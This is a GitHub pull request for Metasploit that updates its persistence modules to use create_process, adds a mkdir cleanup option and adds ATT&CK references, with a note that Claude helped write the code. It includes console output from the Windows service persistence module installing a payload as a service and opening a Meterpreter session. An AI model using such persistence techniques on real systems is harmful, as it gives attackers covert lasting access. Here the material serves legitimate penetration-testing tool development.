Persistence Module Updates (create_process, mkdir, attck) #21496

Open: h00die wants to merge 2 commits into rapid7:master from h00die:cmd_to_create_process

h00die (Contributor) commented May 25, 2026

Updates persistence modules to:

  1. use create_process instead of cmd_exec
  2. use mkdir/chmod with the "Add cleanup toggle to file mixin mkdir method" (#21286) update
  3. Add missing attck references

Claude assisted in generating this code

Verification

Spot check using a few modules should be relatively straightforward.

windows/service looked to be one of the more complicated changes, so I ran it:

msf exploit(windows/persistence/service) > [*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Likely exploitable
[*] Compiling payload
[+] Payload written to C:\Users\windows\AppData\Local\Temp\ajCCth.exe
[*] Attempting API method
[*] Install service: FIfRHIB (JcxIXLfYF)
[*] Service install code: 0
[*] Starting service
[*] Sending stage (199238 bytes) to 2.2.2.2
[*] Service start code: 0
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20260525.3348/WIN10PROLICENSE_20260525.3348.rc
[*] Meterpreter session 3 opened (1.1.1.1:7781 -> 2.2.2.2:59357) at 2026-05-25 12:33:51 -0400

Also ran bits since it's a more complicated change.

It was working, but then I did clear and lost it, so just trust me on this one 😉

@github-actions

Thanks for your pull request! As part of our landing process, we manually verify that all modules work as expected.

We've added the additional-testing-required label to indicate that additional testing is required before this pull request can be merged.
For maintainers, this means visiting here.
